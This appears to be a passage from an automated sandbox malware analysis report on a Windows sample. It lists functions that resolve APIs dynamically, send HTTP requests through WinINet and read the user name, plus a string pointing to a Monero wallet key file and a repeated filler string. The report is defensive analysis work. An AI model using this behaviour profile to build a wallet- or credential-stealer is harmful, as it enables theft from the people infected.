                              • Associated: 00000000.00000002.1766639416.0000000000B75000.00000080.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1766850074.0000000000D09000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1766879303.0000000000D0A000.00000080.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_680000_file.jbxd
                              Yara matches
                              Similarity
                              • API ID: AllocateHeapProtectVirtual
                              • String ID: The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.
                              • API String ID: 1542196881-2218711628
                              • Opcode ID: 9c4a41df6e23bdef17765bdd1d265d33d8945b029d2165286119870cf1063b2e
                              • Instruction ID: 90277e5c3365dfb3e78ac40aee84fe76876ace450d49027ea3c058212d0db502
                              • Opcode Fuzzy Hash: 9c4a41df6e23bdef17765bdd1d265d33d8945b029d2165286119870cf1063b2e
                              • Instruction Fuzzy Hash: AA41F3607C6684FEC73CF7A4A84FE9D76575FCBB00F935044E841A6285CFB069404B26
                              Function 00684880 Relevance: 28.5, APIs: 11, Strings: 5, Instructions: 479networkstringfileCOMMON
                              Download Yara Rule

                              Control-flow Graph

                              • Executed
                              • Not Executed
                              control_flow_graph 801 684880-684942 call 69a7a0 call 6847b0 call 69a740 * 5 InternetOpenA StrCmpCA 816 68494b-68494f 801->816 817 684944 801->817 818 684ecb-684ef3 InternetCloseHandle call 69aad0 call 689ac0 816->818 819 684955-684acd call 698b60 call 69a920 call 69a8a0 call 69a800 * 2 call 69a9b0 call 69a8a0 call 69a800 call 69a9b0 call 69a8a0 call 69a800 call 69a920 call 69a8a0 call 69a800 call 69a9b0 call 69a8a0 call 69a800 call 69a9b0 call 69a8a0 call 69a800 call 69a9b0 call 69a920 call 69a8a0 call 69a800 * 2 InternetConnectA 816->819 817->816 828 684f32-684fa2 call 698990 * 2 call 69a7a0 call 69a800 * 8 818->828 829 684ef5-684f2d call 69a820 call 69a9b0 call 69a8a0 call 69a800 818->829 819->818 905 684ad3-684ad7 819->905 829->828 906 684ad9-684ae3 905->906 907 684ae5 905->907 908 684aef-684b22 HttpOpenRequestA 906->908 907->908 909 684b28-684e28 call 69a9b0 call 69a8a0 call 69a800 call 69a920 call 69a8a0 call 69a800 call 69a9b0 call 69a8a0 call 69a800 call 69a9b0 call 69a8a0 call 69a800 call 69a9b0 call 69a8a0 call 69a800 call 69a9b0 call 69a8a0 call 69a800 call 69a920 call 69a8a0 call 69a800 call 69a9b0 call 69a8a0 call 69a800 call 69a9b0 call 69a8a0 call 69a800 call 69a920 call 69a8a0 call 69a800 call 69a9b0 call 69a8a0 call 69a800 call 69a9b0 call 69a8a0 call 69a800 call 69a9b0 call 69a8a0 call 69a800 call 69a9b0 call 69a8a0 call 69a800 call 69a920 call 69a8a0 call 69a800 call 69a740 call 69a920 * 2 call 69a8a0 call 69a800 * 2 call 69aad0 lstrlen call 69aad0 * 2 lstrlen call 69aad0 HttpSendRequestA 908->909 910 684ebe-684ec5 InternetCloseHandle 908->910 1021 684e32-684e5c InternetReadFile 909->1021 910->818 1022 684e5e-684e65 1021->1022 1023 684e67-684eb9 InternetCloseHandle call 69a800 1021->1023 1022->1023 1024 684e69-684ea7 call 69a9b0 call 69a8a0 call 69a800 1022->1024 1023->910 1024->1021
                              APIs
                                • Part of subcall function 0069A7A0: lstrcpy.KERNEL32(?,00000000), ref: 0069A7E6
                                • Part of subcall function 006847B0: lstrlen.KERNEL32(00000000,00000000,0000003C), ref: 00684839
                                • Part of subcall function 006847B0: InternetCrackUrlA.WININET(00000000,00000000), ref: 00684849
                                • Part of subcall function 0069A740: lstrcpy.KERNEL32(006A0E17,00000000), ref: 0069A788
                              • InternetOpenA.WININET(00000000,00000001,00000000,00000000,00000000), ref: 00684915
                              • StrCmpCA.SHLWAPI(?,0148E838), ref: 0068493A
                              • InternetConnectA.WININET(00000000,?,?,00000000,00000000,00000003,00000000,00000000), ref: 00684ABA
                              • lstrlen.KERNEL32(00000000,00000000,?,?,?,?,006A0DDB,00000000,?,?,00000000,?,",00000000,?,0148E8A8), ref: 00684DE8
                              • lstrlen.KERNEL32(00000000,00000000,00000000), ref: 00684E04
                              • HttpSendRequestA.WININET(00000000,00000000,00000000), ref: 00684E18
                              • InternetReadFile.WININET(00000000,?,000007CF,?), ref: 00684E49
                              • InternetCloseHandle.WININET(00000000), ref: 00684EAD
                              • InternetCloseHandle.WININET(00000000), ref: 00684EC5
                              • HttpOpenRequestA.WININET(00000000,0148E7A8,?,0148DF30,00000000,00000000,00400100,00000000), ref: 00684B15
                                • Part of subcall function 0069A9B0: lstrlen.KERNEL32(?,014891A8,?,\Monero\wallet.keys,006A0E17), ref: 0069A9C5
                                • Part of subcall function 0069A9B0: lstrcpy.KERNEL32(00000000), ref: 0069AA04
                                • Part of subcall function 0069A9B0: lstrcat.KERNEL32(00000000,00000000), ref: 0069AA12
                                • Part of subcall function 0069A8A0: lstrcpy.KERNEL32(?,006A0E17), ref: 0069A905
                                • Part of subcall function 0069A920: lstrcpy.KERNEL32(00000000,?), ref: 0069A972
                                • Part of subcall function 0069A920: lstrcat.KERNEL32(00000000), ref: 0069A982
                              • InternetCloseHandle.WININET(00000000), ref: 00684ECF
                              Strings
                              Memory Dump Source
                              • Source File: 00000000.00000002.1765888735.0000000000681000.00000040.00000001.01000000.00000003.sdmp, Offset: 00680000, based on PE: true
                              • Associated: 00000000.00000002.1765836063.0000000000680000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1765888735.0000000000731000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1765888735.000000000073D000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1765888735.0000000000762000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1765888735.00000000008CA000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1766068296.00000000008DE000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1766068296.0000000000A5E000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1766068296.0000000000B37000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1766068296.0000000000B5E000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1766068296.0000000000B65000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1766068296.0000000000B74000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1766639416.0000000000B75000.00000080.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1766850074.0000000000D09000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1766879303.0000000000D0A000.00000080.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_680000_file.jbxd
                              Yara matches
                              Similarity
                              • API ID: Internet$lstrcpy$lstrlen$CloseHandle$HttpOpenRequestlstrcat$ConnectCrackFileReadSend
                              • String ID: "$"$------$------$------
                              • API String ID: 460715078-2180234286
                              • Opcode ID: 7ac2fbebc63bd5802c71d420feddee217f22b94d9f6d2cf1db2d882883a0bcb6
                              • Instruction ID: 1e9272e0a36d166422f7eb91f374de04df4d18a0dada76f0fdc1716fc02316af
                              • Opcode Fuzzy Hash: 7ac2fbebc63bd5802c71d420feddee217f22b94d9f6d2cf1db2d882883a0bcb6
                              • Instruction Fuzzy Hash: 6912E971921118AADF54EB90DD92FEEB3BEBF15300F50419DB10662491EF702E49CFAA
                              Function 00697850 Relevance: 4.5, APIs: 3, Instructions: 36memoryCOMMON
                              Download Yara Rule
                              APIs
                              • GetProcessHeap.KERNEL32(00000000,00000104,?,?,?,006811B7), ref: 00697880
                              • RtlAllocateHeap.NTDLL(00000000), ref: 00697887
                              • GetUserNameA.ADVAPI32(00000104,00000104), ref: 0069789F
                              Memory Dump Source
                              • Source File: 00000000.00000002.1765888735.0000000000681000.00000040.00000001.01000000.00000003.sdmp, Offset: 00680000, based on PE: true
                              • Associated: 00000000.00000002.1765836063.0000000000680000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1765888735.0000000000731000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1765888735.000000000073D000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1765888735.0000000000762000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1765888735.00000000008CA000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1766068296.00000000008DE000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1766068296.0000000000A5E000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1766068296.0000000000B37000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1766068296.0000000000B5E000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1766068296.0000000000B65000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1766068296.0000000000B74000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1766639416.0000000000B75000.00000080.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1766850074.0000000000D09000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1766879303.0000000000D0A000.00000080.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_680000_file.jbxd
                              Yara matches
                              Similarity
                              • API ID: Heap$AllocateNameProcessUser
                              • String ID:
                              • API String ID: 1296208442-0
                              • Opcode ID: d21666ad70c3238a244bbb6f98da01a8c6251b05e34cc1adcbb1621028841625
                              • Instruction ID: d0f13dbc10b9badc13b40dbe5546ec74484ece50901d10e400492ba806b8e903
                              • Opcode Fuzzy Hash: d21666ad70c3238a244bbb6f98da01a8c6251b05e34cc1adcbb1621028841625
                              • Instruction Fuzzy Hash: 8CF04FB1944208ABCB04DF99DD4AFAEBBBCFB04715F10026AFA05A2680C77915048BA1
                              Function 00681160 Relevance: 3.0, APIs: 2, Instructions: 15COMMON
                              Download Yara Rule
                              APIs
                              Memory Dump Source
                              • Source File: 00000000.00000002.1765888735.0000000000681000.00000040.00000001.01000000.00000003.sdmp, Offset: 00680000, based on PE: true
                              • Associated: 00000000.00000002.1765836063.0000000000680000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1765888735.0000000000731000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1765888735.000000000073D000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1765888735.0000000000762000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1765888735.00000000008CA000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1766068296.00000000008DE000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1766068296.0000000000A5E000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1766068296.0000000000B37000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1766068296.0000000000B5E000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1766068296.0000000000B65000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1766068296.0000000000B74000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1766639416.0000000000B75000.00000080.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1766850074.0000000000D09000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1766879303.0000000000D0A000.00000080.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_680000_file.jbxd
                              Yara matches
                              Similarity
                              • API ID: ExitInfoProcessSystem
                              • String ID:
                              • API String ID: 752954902-0
                              • Opcode ID: d5fbe88888d172d4a4bb7c3888ddf4f9eecd6c369862836c195b7480d4f69ca5
                              • Instruction ID: 44cf5ee2f88dbaa916132db9e137101b0d4ad597031a064159f15f0a3dcaea39
                              • Opcode Fuzzy Hash: d5fbe88888d172d4a4bb7c3888ddf4f9eecd6c369862836c195b7480d4f69ca5
                              • Instruction Fuzzy Hash: F6D05E7490030CDBCB04EFE0DC8DADDBB78FB08315F000694D94562340EA305482CBA6
                              Function 00699C10 Relevance: 200.2, APIs: 112, Strings: 2, Instructions: 684libraryloaderCOMMON
                              Download Yara Rule

                              Control-flow Graph

                              • Executed
                              • Not Executed
                              control_flow_graph 633 699c10-699c1a 634 699c20-69a031 GetProcAddress * 43 633->634 635 69a036-69a0ca LoadLibraryA * 8 633->635 634->635 636 69a0cc-69a141 GetProcAddress * 5 635->636 637 69a146-69a14d 635->637 636->637 638 69a153-69a211 GetProcAddress * 8 637->638 639 69a216-69a21d 637->639 638->639 640 69a298-69a29f 639->640 641 69a21f-69a293 GetProcAddress * 5 639->641 642 69a2a5-69a332 GetProcAddress * 6 640->642 643 69a337-69a33e 640->643 641->640 642->643 644 69a41f-69a426 643->644 645 69a344-69a41a GetProcAddress * 9 643->645 646 69a428-69a49d GetProcAddress * 5 644->646 647 69a4a2-69a4a9 644->647 645->644 646->647 648 69a4ab-69a4d7 GetProcAddress * 2 647->648 649 69a4dc-69a4e3 647->649 648->649 650 69a515-69a51c 649->650 651 69a4e5-69a510 GetProcAddress * 2 649->651 652 69a612-69a619 650->652 653 69a522-69a60d GetProcAddress * 10 650->653 651->650 654 69a61b-69a678 GetProcAddress * 4 652->654 655 69a67d-69a684 652->655 653->652 654->655 656 69a69e-69a6a5 655->656 657 69a686-69a699 GetProcAddress 655->657 658 69a708-69a709 656->658 659 69a6a7-69a703 GetProcAddress * 4 656->659 657->656 659->658
                              APIs
                              • GetProcAddress.KERNEL32(74DD0000,01475E50), ref: 00699C2D
                              • GetProcAddress.KERNEL32(74DD0000,01475E30), ref: 00699C45
                              • GetProcAddress.KERNEL32(74DD0000,01489658), ref: 00699C5E
                              • GetProcAddress.KERNEL32(74DD0000,01489670), ref: 00699C76
                              • GetProcAddress.KERNEL32(74DD0000,014896B8), ref: 00699C8E
                              • GetProcAddress.KERNEL32(74DD0000,014896D0), ref: 00699CA7
                              • GetProcAddress.KERNEL32(74DD0000,0147BCE8), ref: 00699CBF
                              • GetProcAddress.KERNEL32(74DD0000,0148CE10), ref: 00699CD7
                              • GetProcAddress.KERNEL32(74DD0000,0148D0C8), ref: 00699CF0
                              • GetProcAddress.KERNEL32(74DD0000,0148CE28), ref: 00699D08
                              • GetProcAddress.KERNEL32(74DD0000,0148CF18), ref: 00699D20
                              • GetProcAddress.KERNEL32(74DD0000,01475C30), ref: 00699D39
                              • GetProcAddress.KERNEL32(74DD0000,01475B10), ref: 00699D51
                              • GetProcAddress.KERNEL32(74DD0000,01475DB0), ref: 00699D69
                              • GetProcAddress.KERNEL32(74DD0000,01475B30), ref: 00699D82
                              • GetProcAddress.KERNEL32(74DD0000,0148CF60), ref: 00699D9A
                              • GetProcAddress.KERNEL32(74DD0000,0148CF00), ref: 00699DB2
                              • GetProcAddress.KERNEL32(74DD0000,0147BD60), ref: 00699DCB
                              • GetProcAddress.KERNEL32(74DD0000,01475C70), ref: 00699DE3
                              • GetProcAddress.KERNEL32(74DD0000,0148CFC0), ref: 00699DFB
                              • GetProcAddress.KERNEL32(74DD0000,0148D020), ref: 00699E14
                              • GetProcAddress.KERNEL32(74DD0000,0148CF30), ref: 00699E2C
                              • GetProcAddress.KERNEL32(74DD0000,0148CE88), ref: 00699E44
                              • GetProcAddress.KERNEL32(74DD0000,01475C90), ref: 00699E5D
                              • GetProcAddress.KERNEL32(74DD0000,0148D0E0), ref: 00699E75
                              • GetProcAddress.KERNEL32(74DD0000,0148D038), ref: 00699E8D
                              • GetProcAddress.KERNEL32(74DD0000,0148CFD8), ref: 00699EA6
                              • GetProcAddress.KERNEL32(74DD0000,0148D098), ref: 00699EBE
                              • GetProcAddress.KERNEL32(74DD0000,0148D0B0), ref: 00699ED6
                              • GetProcAddress.KERNEL32(74DD0000,0148CE40), ref: 00699EEF
                              • GetProcAddress.KERNEL32(74DD0000,0148CED0), ref: 00699F07
                              • GetProcAddress.KERNEL32(74DD0000,0148CDF8), ref: 00699F1F
                              • GetProcAddress.KERNEL32(74DD0000,0148CE58), ref: 00699F38
                              • GetProcAddress.KERNEL32(74DD0000,0148A270), ref: 00699F50
                              • GetProcAddress.KERNEL32(74DD0000,0148CF78), ref: 00699F68
                              • GetProcAddress.KERNEL32(74DD0000,0148CEA0), ref: 00699F81
                              • GetProcAddress.KERNEL32(74DD0000,01475D10), ref: 00699F99
                              • GetProcAddress.KERNEL32(74DD0000,0148CE70), ref: 00699FB1
                              • GetProcAddress.KERNEL32(74DD0000,014757B0), ref: 00699FCA
                              • GetProcAddress.KERNEL32(74DD0000,0148CEB8), ref: 00699FE2
                              • GetProcAddress.KERNEL32(74DD0000,0148CEE8), ref: 00699FFA
                              • GetProcAddress.KERNEL32(74DD0000,01475A30), ref: 0069A013
                              • GetProcAddress.KERNEL32(74DD0000,014757D0), ref: 0069A02B
                              • LoadLibraryA.KERNEL32(0148CFF0,?,00695CA3,006A0AEB,?,?,?,?,?,?,?,?,?,?,006A0AEA,006A0AE3), ref: 0069A03D
                              • LoadLibraryA.KERNEL32(0148CF48,?,00695CA3,006A0AEB,?,?,?,?,?,?,?,?,?,?,006A0AEA,006A0AE3), ref: 0069A04E
                              • LoadLibraryA.KERNEL32(0148CF90,?,00695CA3,006A0AEB,?,?,?,?,?,?,?,?,?,?,006A0AEA,006A0AE3), ref: 0069A060
                              • LoadLibraryA.KERNEL32(0148D080,?,00695CA3,006A0AEB,?,?,?,?,?,?,?,?,?,?,006A0AEA,006A0AE3), ref: 0069A072
                              • LoadLibraryA.KERNEL32(0148CFA8,?,00695CA3,006A0AEB,?,?,?,?,?,?,?,?,?,?,006A0AEA,006A0AE3), ref: 0069A083
                              • LoadLibraryA.KERNEL32(0148D008,?,00695CA3,006A0AEB,?,?,?,?,?,?,?,?,?,?,006A0AEA,006A0AE3), ref: 0069A095
                              • LoadLibraryA.KERNEL32(0148D050,?,00695CA3,006A0AEB,?,?,?,?,?,?,?,?,?,?,006A0AEA,006A0AE3), ref: 0069A0A7
                              • LoadLibraryA.KERNEL32(0148D068,?,00695CA3,006A0AEB,?,?,?,?,?,?,?,?,?,?,006A0AEA,006A0AE3), ref: 0069A0B8
                              • GetProcAddress.KERNEL32(75290000,01475990), ref: 0069A0DA
                              • GetProcAddress.KERNEL32(75290000,0148D398), ref: 0069A0F2
                              • GetProcAddress.KERNEL32(75290000,01488F68), ref: 0069A10A
                              • GetProcAddress.KERNEL32(75290000,0148D368), ref: 0069A123
                              • GetProcAddress.KERNEL32(75290000,01475790), ref: 0069A13B
                              • GetProcAddress.KERNEL32(6FCD0000,0147B608), ref: 0069A160
                              • GetProcAddress.KERNEL32(6FCD0000,01475850), ref: 0069A179
                              • GetProcAddress.KERNEL32(6FCD0000,0147B9C8), ref: 0069A191
                              • GetProcAddress.KERNEL32(6FCD0000,0148D320), ref: 0069A1A9
                              • GetProcAddress.KERNEL32(6FCD0000,0148D1B8), ref: 0069A1C2
                              • GetProcAddress.KERNEL32(6FCD0000,014759D0), ref: 0069A1DA
                              • GetProcAddress.KERNEL32(6FCD0000,01475750), ref: 0069A1F2
                              • GetProcAddress.KERNEL32(6FCD0000,0148D308), ref: 0069A20B
                              • GetProcAddress.KERNEL32(752C0000,01475870), ref: 0069A22C
                              • GetProcAddress.KERNEL32(752C0000,014756B0), ref: 0069A244
                              • GetProcAddress.KERNEL32(752C0000,0148D3E0), ref: 0069A25D
                              • GetProcAddress.KERNEL32(752C0000,0148D2A8), ref: 0069A275
                              • GetProcAddress.KERNEL32(752C0000,014757F0), ref: 0069A28D
                              • GetProcAddress.KERNEL32(74EC0000,0147B6F8), ref: 0069A2B3
                              • GetProcAddress.KERNEL32(74EC0000,0147B6A8), ref: 0069A2CB
                              • GetProcAddress.KERNEL32(74EC0000,0148D2D8), ref: 0069A2E3
                              • GetProcAddress.KERNEL32(74EC0000,01475770), ref: 0069A2FC
                              • GetProcAddress.KERNEL32(74EC0000,01475A50), ref: 0069A314
                              • GetProcAddress.KERNEL32(74EC0000,0147B9A0), ref: 0069A32C
                              • GetProcAddress.KERNEL32(75BD0000,0148D338), ref: 0069A352
                              • GetProcAddress.KERNEL32(75BD0000,01475A70), ref: 0069A36A
                              • GetProcAddress.KERNEL32(75BD0000,01488FB8), ref: 0069A382
                              • GetProcAddress.KERNEL32(75BD0000,0148D350), ref: 0069A39B
                              • GetProcAddress.KERNEL32(75BD0000,0148D1D0), ref: 0069A3B3
                              • GetProcAddress.KERNEL32(75BD0000,01475A90), ref: 0069A3CB
                              • GetProcAddress.KERNEL32(75BD0000,01475890), ref: 0069A3E4
                              • GetProcAddress.KERNEL32(75BD0000,0148D380), ref: 0069A3FC
                              • GetProcAddress.KERNEL32(75BD0000,0148D1E8), ref: 0069A414
                              • GetProcAddress.KERNEL32(75A70000,01475970), ref: 0069A436
                              • GetProcAddress.KERNEL32(75A70000,0148D2F0), ref: 0069A44E
                              • GetProcAddress.KERNEL32(75A70000,0148D158), ref: 0069A466
                              • GetProcAddress.KERNEL32(75A70000,0148D3B0), ref: 0069A47F
                              • GetProcAddress.KERNEL32(75A70000,0148D3C8), ref: 0069A497
                              • GetProcAddress.KERNEL32(75450000,01475810), ref: 0069A4B8
                              • GetProcAddress.KERNEL32(75450000,014756D0), ref: 0069A4D1
                              • GetProcAddress.KERNEL32(75DA0000,014758F0), ref: 0069A4F2
                              • GetProcAddress.KERNEL32(75DA0000,0148D260), ref: 0069A50A
                              • GetProcAddress.KERNEL32(6F070000,014759B0), ref: 0069A530
                              • GetProcAddress.KERNEL32(6F070000,014759F0), ref: 0069A548
                              • GetProcAddress.KERNEL32(6F070000,01475830), ref: 0069A560
                              • GetProcAddress.KERNEL32(6F070000,0148D0F8), ref: 0069A579
                              • GetProcAddress.KERNEL32(6F070000,014758B0), ref: 0069A591
                              • GetProcAddress.KERNEL32(6F070000,01475A10), ref: 0069A5A9
                              • GetProcAddress.KERNEL32(6F070000,014758D0), ref: 0069A5C2
                              • GetProcAddress.KERNEL32(6F070000,014756F0), ref: 0069A5DA
                              • GetProcAddress.KERNEL32(6F070000,InternetSetOptionA), ref: 0069A5F1
                              • GetProcAddress.KERNEL32(6F070000,HttpQueryInfoA), ref: 0069A607
                              • GetProcAddress.KERNEL32(75AF0000,0148D2C0), ref: 0069A629
                              • GetProcAddress.KERNEL32(75AF0000,01488FC8), ref: 0069A641
                              • GetProcAddress.KERNEL32(75AF0000,0148D110), ref: 0069A659
                              • GetProcAddress.KERNEL32(75AF0000,0148D170), ref: 0069A672
                              • GetProcAddress.KERNEL32(75D90000,01475910), ref: 0069A693
                              • GetProcAddress.KERNEL32(6CFC0000,0148D200), ref: 0069A6B4
                              • GetProcAddress.KERNEL32(6CFC0000,01475710), ref: 0069A6CD
                              • GetProcAddress.KERNEL32(6CFC0000,0148D218), ref: 0069A6E5
                              • GetProcAddress.KERNEL32(6CFC0000,0148D188), ref: 0069A6FD
                              Strings
                              Memory Dump Source
                              • Source File: 00000000.00000002.1765888735.0000000000681000.00000040.00000001.01000000.00000003.sdmp, Offset: 00680000, based on PE: true
                              • Associated: 00000000.00000002.1765836063.0000000000680000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1765888735.0000000000731000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1765888735.000000000073D000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1765888735.0000000000762000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1765888735.00000000008CA000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1766068296.00000000008DE000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1766068296.0000000000A5E000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1766068296.0000000000B37000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1766068296.0000000000B5E000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1766068296.0000000000B65000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1766068296.0000000000B74000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1766639416.0000000000B75000.00000080.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1766850074.0000000000D09000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1766879303.0000000000D0A000.00000080.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_680000_file.jbxd
                              Yara matches
                              Similarity
                              • API ID: AddressProc$LibraryLoad
                              • String ID: HttpQueryInfoA$InternetSetOptionA
                              • API String ID: 2238633743-1775429166
                              • Opcode ID: d4b34e84065022e7ffa2a3ed557908043b71c11ae208208598f063d6f271b6de
                              • Instruction ID: a6a0f6526888c5f7463c6b466279a0297e02667b5c983ce207251dad48f08205
                              • Opcode Fuzzy Hash: d4b34e84065022e7ffa2a3ed557908043b71c11ae208208598f063d6f271b6de
                              • Instruction Fuzzy Hash: AC624CB550020CAFC34CDFA8FD88D663BF9F78C709B14852AA649C3224D739A851DF56
